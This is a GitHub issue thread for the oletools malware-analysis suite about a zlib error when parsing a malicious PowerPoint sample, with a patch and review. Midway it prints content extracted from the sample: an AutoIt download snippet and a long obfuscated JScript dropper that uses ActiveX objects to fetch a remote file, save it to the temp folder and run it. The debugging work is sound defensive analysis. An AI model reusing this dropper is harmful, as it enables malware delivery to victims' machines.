
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools

ppt_parser: zlib.error: Error -3 while decompressing data: incorrect header check #608

Open decalage2 opened 4 years ago

decalage2 commented 4 years ago

I get this exception when running olevba 0.56dev8 on Python 3.8.3 and Python 2.7.18 (Windows 10), with this sample: 381ad5eabe618fc31a87e0b410a49b4d627b09d244053d99caa74e4d683401b7.ppt https://www.virustotal.com/gui/file/381ad5eabe618fc31a87e0b410a49b4d627b09d244053d99caa74e4d683401b7/detection

jloehel commented 4 years ago

Could you please share the sample on polyswarm.network?

decalage2 commented 4 years ago

OK, it's here: https://polyswarm.network/scan/results/file/381ad5eabe618fc31a87e0b410a49b4d627b09d244053d99caa74e4d683401b7

jloehel commented 4 years ago

The stream does not have a zlib header. It works with this patch:

diff --git a/oletools/ppt_parser.py b/oletools/ppt_parser.py
index 93b75a4..e7a91c6 100644
--- a/oletools/ppt_parser.py
+++ b/oletools/ppt_parser.py
@@ -1613,7 +1613,7 @@ class PptParser(object):
 def iterative_decompress(stream, size, chunk_size=4096):
     """ decompress data from stream chunk-wise """

-    decompressor = zlib.decompressobj()
+    decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
     n_read = 0
     decomp = b''
     return_err = None
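Review bot: Passing `-zlib.MAX_WBITS` unconditionally on the `+` line switches `iterative_decompress` to raw DEFLATE for every caller, so streams that do carry the RFC 1950 zlib header (the case the original call handled) would now fail with the same `zlib.error` this issue reports. A less disruptive fix keeps the old default and lets the caller choose: `def iterative_decompress(stream, size, chunk_size=4096, wbits=zlib.MAX_WBITS):` and `decompressor = zlib.decompressobj(wbits)`, with the caller retrying with `wbits=-zlib.MAX_WBITS` when the first attempt raises `zlib.error`. The docstring should then document the new parameter, e.g. `wbits: zlib.MAX_WBITS for a zlib-wrapped stream, -zlib.MAX_WBITS for header-less raw DEFLATE as seen in the #608 sample`. The loop that consumes the stream and honours `size` lies outside the hunk; since these inputs are attacker-controlled samples, it is worth confirming there that the decompressed output is bounded and not only the bytes read.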

The decompressed object contains, for example, this snippet loading putty from https://the.earth.li:

FileURL = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"\r\n$FileName = "%temp%\\Setup.exe"\r\n$FileSize = InetGetSize($FileURL)\r\n\r\nInetGet($FileURL,$FileName,0,1)

Javascript Payload

function qRpM() {
    \
    n\ tswitch(true) {
        \
        n\ tcase true: \n\ t\ tvar auerQdS = true;\
        n\ t\ tbreak;\
        n\ tcase "KAcTbZ": \n\ t\ tvar zjBXBY = true;\
        n\ t\ tif(zjBXBY === "1") {
            \
            n\ t\ t\ tvar tCXvxYP = "pGFivN";\
            n\ t\ t
        }\
        n\ t\ tbreak;\
        n\ tcase "XtV": \n\ t\ tvar KdzeFx = false;\
        n\ t\ tif(KdzeFx == "1") {
            \
            n\ t\ t\ tvar UfrrFv = 7571;\
            n\ t\ t\ tvar LVkUq = 9736;\
            n\ t\ t\ tvar kBeK = 5782;\
            n\ t\ t\ tUfrrFv = LVkUq * kBeK;\
            n\ t\ t\ tvar MDtMqJv = 332;\
            n\ t\ t\ tUfrrFv = LVkUq + MDtMqJv;\
            n\ t\ t\ tvar azQltgj = 7585;\
            n\ t\ t\ tazQltgj = kBeK * UfrrFv;\
            n\ t\ t
        }\
        n\ t\ tbreak;\
        n\ t
    };\
    n
}\
nfunction tuIENPO(uPjNUdYs) {
        \
        n\ tvar zt = \'FQaxKJ\';\n\tvar PjW = \'\';\n\tvar uxTntf = (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0);\n\tvar kxRsukom = zt.length;\n\tvar IViwKX = (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0);\n\tvar RxrZmBWV = "";\n\twhile (IViwKX < uPjNUdYs.length - (2082, 6178, 5186, 1077, 6819, 4831, 4581, 5877, 8027, 2094, 2)) {\n\t\tRxrZmBWV = uPjNUdYs.charAt(IViwKX) + uPjNUdYs.charAt(IViwKX + (3925, 2090, 3988, 6491, 1166, 2655, 3420, 7246, 773, 1)) + uPjNUdYs.charAt(IViwKX + (2082, 6178, 5186, 1077, 6819, 4831, 4581, 5877, 8027, 2094, 2));\n\t\tif (uPjNUdYs.charAt(IViwKX) == (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0)) {\n\t\t\tRxrZmBWV = uPjNUdYs.charAt(IViwKX + (3925, 2090, 3988, 6491, 1166, 2655, 3420, 7246, 773, 1)) + uPjNUdYs.charAt(IViwKX + (2));\n\t\t}\n\t\tif ((uPjNUdYs.charAt(IViwKX) == (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0)) && (uPjNUdYs.charAt(IViwKX + (3925, 2090, 3988, 6491, 1166, 2655, 3420, 7246, 773, 1)) == (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0))) {\n\t\t\tRxrZmBWV = uPjNUdYs.charAt(IViwKX + (2082, 6178, 5186, 1077, 6819, 4831, 4581, 5877, 8027, 2094, 2));\n\t\t}\n\t\tuxTntf = parseInt(RxrZmBWV);\n\t\tuxTntf = uxTntf ^ (zt.charCodeAt(IViwKX / (6212, 5041, 2081, 6439, 9374, 3) % kxRsukom));\n\t\tPjW += String.fromCharCode(uxTntf);\n\t\tIViwKX += (3);\n\t}\n\treturn PjW;\n}\nfunction FWpMQj(PgVUdv, vRyryV) {\n\tswitch (PgVUdv) {\n\tcase 3942:\n\t\tvar bdTo = "owirTd";\n\t\tif (bdTo == "0") {\n\t\t\tvar AGhO = 9038;\n\t\t\tvar GbZAw = 7639;\n\t\t\tvar lryOvaQ = 5193;\n\t\t\tAGhO = GbZAw - lryOvaQ;\n\t\t\tvar yQA = 5031;\n\t\t\tyQA = 8757 + 2375;\n\t\t}\n\t\tbreak;\n\tcase true:\n\t\tvar yJuZi = 1984;\n\t\tbreak;\n\tcase false:\n\t\tvar UDIYq = 85992;\n\t\tif (UDIYq == true) {\n\t\t\tvar OEMl = 5181;\n\t\t\tOEMl = 5967 / 7425;\n\t\t\tvar LvmVl = 2979;\n\t\t\tLvmVl = 6173 * 1515;\n\t\t\tOEMl = 4183 + 
6287;\n\t\t}\n\t\tbreak;\n\t};\n\tswitch (true) {\n\tcase "0":\n\t\tvar fWryi = 38020;\n\t\tif (fWryi == false) {\n\t\t\tvar OWk = false;\n\t\t}\n\t\tbreak;\n\tcase 9319:\n\t\tif (PgVUdv === "0") {\n\t\t\tvar nOByS = 8179;\n\t\t\tvar uMDSk = 542;\n\t\t\tvar eLR = 5279;\n\t\t\tnOByS = uMDSk / eLR;\n\t\t\tvar aaUu = 7609;\n\t\t\tvar guvpQyk = 9881;\n\t\t\taaUu = nOByS - guvpQyk;\n\t\t\tnOByS = 4232 - 7846;\n\t\t\tvar nXBke = 9108;\n\t\t\tguvpQyk = uMDSk + nXBke;\n\t\t}\n\t\tbreak;\n\tcase "0":\n\t\tvar OUN = "GSNr";\n\t\tbreak;\n\tcase "1":\n\t\tvar jStFHGC = "UANDml";\n\t\tbreak;\n\tcase 4790:\n\t\tvar fsSMlG = 7420;\n\t\tbreak;\n\t};\n}\nfunction DjfwCKd() {\n\tvar RdRIlI = 77017;\n\tif (RdRIlI == "1") {\n\t\tvar svSvcV = 4062;\n\t\tvar NDlWv = 394;\n\t\tvar Xmv = 4178;\n\t\tsvSvcV = NDlWv + Xmv;\n\t\tvar MADmXm = 5650;\n\t\tvar szw = 6402;\n\t\tMADmXm = szw - Xmv;\n\t\tszw = 8534 + 869;\n\t}\n\tswitch ("0") {\n\tcase true:\n\t\tvar bom = "KouRipW";\n\t\tif (bom == 10802) {\n\t\t\tvar jgN = 6345;\n\t\t\tvar xSA = 5618;\n\t\t\tvar XhdL = 1590;\n\t\t\tjgN = xSA - XhdL;\n\t\t\tvar XLwSpya = 8451;\n\t\t\tvar fCAv = 4805;\n\t\t\tjgN = XLwSpya + fCAv;\n\t\t\tvar AlQKsEr = 3250;\n\t\t\tvar cNusl = 4086;\n\t\t\tAlQKsEr = cNusl * XLwSpya;\n\t\t}\n\t\tbreak;\n\tcase true:\n\t\tvar SrULR = false;\n\t\tbreak;\n\t};\n\tswitch ("1") {\n\tcase false:\n\t\tvar fEDF = false;\n\t\tbreak;\n\tcase "1":\n\t\tvar ZlvIvS = true;\n\t\tif (ZlvIvS === "0") {\n\t\t\tvar sxHs = 13310;\n\t\t}\n\t\tbreak;\n\t};\n\tvar aVeDuDm = 42845;\n\tif (aVeDuDm === 17447) {\n\t\tvar WsMyxBl = "YttWoAg";\n\t}\n\tswitch (17640) {\n\tcase 12971:\n\t\tvar rKxXkvV = 11967;\n\t\tbreak;\n\tcase "0":\n\t\tvar Rkh = false;\n\t\tbreak;\n\tcase "cBXoK":\n\t\tvar jmY = 75703;\n\t\tif (jmY === false) {\n\t\t\tvar qvbaTY = 18499;\n\t\t}\n\t\tbreak;\n\tcase "ZsspNt":\n\t\tvar ZcUzheL = 10816;\n\t\tbreak;\n\t};\n\tvar swvOB = false;\n\tif (swvOB === false) {\n\t\tvar uYU = 13078;\n\t}\n\treturn true;\n}\nfunction rBVlSX() 
{\n\tvar QlxFKoE = tuIENPO("046037021008113101105096081076101120117105079073124126104096081076100035045063014015100121127102087086115120115");\n\tvar ieVmQbj = new ActiveXObject(tuIENPO("017002002010034058050127050016046038042"));\n\tvar aBQqp = new ActiveXObject(tuIENPO("021050019017059062047063006086013035042052050001056062035060046026033047037037"));\n\tvar GWB = aBQqp[tuIENPO("001052021043059047037056000020013037042053004010")]((4769, 3932, 2)) + \'\\\\\' + aBQqp[tuIENPO("001052021044046039054031000021046")]();\n\tvar RNa = new ActiveXObject(tuIENPO("011002057053007120104009044052003030018001"));\n\tRNa[tuIENPO("041033004022")](tuIENPO("001020053"), QlxFKoE, false);\n\tRNa[tuIENPO("053052015028")]();\n\tif (RNa[tuIENPO("021037000012062057")] == (3870, 6431, 9088, 200)) {\n\t\tvar zRaWwLl = new ActiveXObject(tuIENPO("007021046060009100021037019029042039"));\n\t\tzRaWwLl[tuIENPO("009033004022")]();\n\t\tzRaWwLl[tuIENPO("018040017029")] = (8205, 3749, 4311, 3553, 1912, 7447, 1);\n\t\tzRaWwLl[tuIENPO("017035008012046")](RNa[tuIENPO("020052018008036036053052035023047051")]);\n\t\tzRaWwLl[tuIENPO("022062018017063035041063")] = (3830, 3734, 5845, 9193, 5245, 4226, 6738, 5407, 2129, 0);\n\t\tzRaWwLl[tuIENPO("021048023029031037000056013029")](GWB);\n\t\tzRaWwLl[tuIENPO("005061014011046")]();\n\t\tieVmQbj[tuIENPO("052036015")](tuIENPO("037060005086046050035113078027107") + GWB, (3830, 3734, 5845, 9193, 5245, 4226, 6738, 5407, 2129, 0));\n\t}\n}\nfunction rQvLVPt(jkI, uukOO, KpktRv, kHIaE) {\n\tswitch ("KAVL") {\n\tcase "lgiRZjR":\n\t\tvar hIjtiZ = "QGle";\n\t\tvar QOhnPSs = true;\n\t\tif (QOhnPSs === false) {\n\t\t\tvar nwmSQhW = 1043;\n\t\t\tnwmSQhW = 888 + 4098;\n\t\t\tvar NVdV = 1756;\n\t\t\tNVdV = 6958 / 3722;\n\t\t\tvar ZLdnsXW = 292;\n\t\t\tvar pkDxgI = 7334;\n\t\t\tvar EPONJBp = 2716;\n\t\t\tZLdnsXW = pkDxgI - EPONJBp;\n\t\t\tvar NBEpVkm = 9100;\n\t\t\tNBEpVkm = 38 + 9194;\n\t\t\tvar qioneqd = 3490;\n\t\t\tqioneqd = 7024 - 7149;\n\t\t}\n\t\tvar ZTD = 
24318;\n\t\tif (ZTD === "0") {\n\t\t\tvar JbSa = 7215;\n\t\t\tJbSa = 5748 / 6275;\n\t\t\tvar zIbyehq = 1048;\n\t\t\tzIbyehq = 9332 / 1410;\n\t\t\tvar nZwkGY = 3897;\n\t\t\tvar gSauw = 2640;\n\t\t\tnZwkGY = nZwkGY * gSauw;\n\t\t\tvar qJOmo = 8135;\n\t\t\tnZwkGY = qJOmo * gSauw;\n\t\t}\n\t\tvar Cetd = "MHDtGJp";\n\t\tif (Cetd == 4845) {\n\t\t\tvar UCsba = "DuyM";\n\t\t\tvar uhgc = true;\n\n\t\t}\n\t\tbreak;\n\tcase "0":\n\t\tvar TLqL = 32546;\n\t\tif (TLqL == "zWmMA") {\n\t\t\tvar Ikj = 4992;\n\t\t\tvar aeqb = 7528;\n\t\t\tvar PLBGodK = 6426;\n\t\t\tIkj = aeqb - PLBGodK;\n\t\t\tvar trA = 2770;\n\t\t\tvar lnKFE = 2155;\n\t\t\tPLBGodK = trA * lnKFE;\n\t\t\tlnKFE = PLBGodK / Ikj;\n\t\t\tPLBGodK = aeqb + trA;\n\t\t\tlnKFE = aeqb + PLBGodK;\n\t\t}\n\t\tbreak;\n\t};\n\tvar fVKbUu = true;\n\tvar TJISrv = false;\n\treturn 1;\n}\nfunction vQYlUW(RxNT, WwSv, HHj, YDsgKv) {\n\tvar bPkfAZS = true;\n\tvar wLQqcFj = "ulhSsrY";\n\tswitch (3537) {\n\tcase "OFQfHwoG":\n\t\tvar LPraj = false;\n\t\tbreak;\n\tcase "nbYZQq":\n\t\tvar JTgHNB = 34286;\n\t\tbreak;\n\t};\n\n\tvar YttvSP = "zCCTOL";\n\tswitch (YDsgKv) {\n\tcase true:\n\t\tvar SJiSCd = 83654;\n\t\tbreak;\n\tcase "0":\n\t\tif (WwSv == false) {\n\t\t\tvar yhkm = 5932;\n\t\t\tvar dZS = 7182;\n\t\t\tyhkm = yhkm * dZS;\n\t\t\tvar YNxAHlm = 4574;\n\t\t\tYNxAHlm = 6856 / 8940;\n\t\t\tYNxAHlm = 1366 * 7535;\n\t\t\tvar tQNgQj = 2299;\n\t\t\tyhkm = YNxAHlm - tQNgQj;\n\t\t}\n\t\tbreak;\n\tcase "1":\n\t\tif (YDsgKv === "0") {\n\t\t\tvar dbHvTI = true;\n\t\t}\n\t\tbreak;\n\tcase "OciygkfC":\n\t\tvar DxKfEw = "RaUqP";\n\t\tbreak;\n\t};\n\tvar hVsRJW = false;\n}\nfunction aIVZ(QCinR, erDNkJ) {\n\tvar acN = true;\n\tif (acN == false) {\n\t\tvar vLtUF = 7683;\n\t\tvar ALSN = 1606;\n\t\tvar uHoMqyO = 5263;\n\t\tvLtUF = ALSN + uHoMqyO;\n\t\tvar vhRny = 9517;\n\t\tALSN = vLtUF + vhRny;\n\t\tvar LCoHDo = 101;\n\t\tLCoHDo = 9096 / 6830;\n\t\tvar yUuNBXb = 5479;\n\t\tyUuNBXb = 4003 * 9521;\n\t\tvar tfxsIkb = 2041;\n\t\tLCoHDo = uHoMqyO - 
tfxsIkb;\n\t}\n\tswitch (QCinR) {\n\tcase "0":\n\t\tvar Nbz = "UNNUUI";\n\t\tbreak;\n\tcase "NgEWXIJ":\n\t\tvar YDYDigV = 37959;\n\t\tbreak;\n\t};\n\treturn 1;\n}\nif (aIVZ(15910, "0") == true) {\n\tif (DjfwCKd("1") == true) {\n\t\tif (rQvLVPt("0", 9347, false, "1") == true) {\n\t\t\trBVlSX();\n\t\t} else {\n\t\t\tFWpMQj(false, "1");\n\t\t}\n\t}\n} else {\n\tvQYlUW("MzqpH", "1", false, true);\n}\nqRpM("0");
ghanashyams commented 4 years ago

I could see issue in pptparser for 0.55 also, here the scan result. Sample 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f is available in VT.

python olevba.py 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f olevba 0.55.1 on Python 3.7.4 - http://decalage.info/python/oletools ERROR Failed to open 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f -- probably not supported! Traceback (most recent call last): File "olevba.py", line 4138, in process_file relaxed=options.relaxed) File "olevba.py", line 3732, in __init__ super(VBA_Parser_CLI, self).__init__(*args, **kwargs) File "olevba.py", line 2697, in __init__ self.open_ppt() File "olevba.py", line 3002, in open_ppt container='PptParser')) File "olevba.py", line 2745, in __init__ raise FileOpenError(msg) FileOpenError: Failed to open file None is not a supported file type, cannot extract VBA Macros.

jloehel commented 4 years ago

I could see issue in pptparser for 0.55 also, here the scan result. Sample 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f is available in VT.

python olevba.py 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f olevba 0.55.1 on Python 3.7.4 - http://decalage.info/python/oletools ERROR Failed to open 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f -- probably not supported! Traceback (most recent call last): File "olevba.py", line 4138, in process_file relaxed=options.relaxed) File "olevba.py", line 3732, in __init__ super(VBA_Parser_CLI, self).__init__(*args, **kwargs) File "olevba.py", line 2697, in __init__ self.open_ppt() File "olevba.py", line 3002, in open_ppt container='PptParser')) File "olevba.py", line 2745, in __init__ raise FileOpenError(msg) FileOpenError: Failed to open file None is not a supported file type, cannot extract VBA Macros.

I am not sure about this traceback. I saw the same issue if the parsing of the ole_subfiles fails. https://github.com/decalage2/oletools/blob/a7a9ff7e0a6955e893bd1ff72efdea265ab417db/oletools/olevba.py#L3019 There the filename is None. Maybe it was not possible to parse a record in the ole_subfiles. Can you please upload the sample to https://polyswarm.network/.

ghanashyams commented 4 years ago

Uploaded the sample https://polyswarm.network/scan/results/file/01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f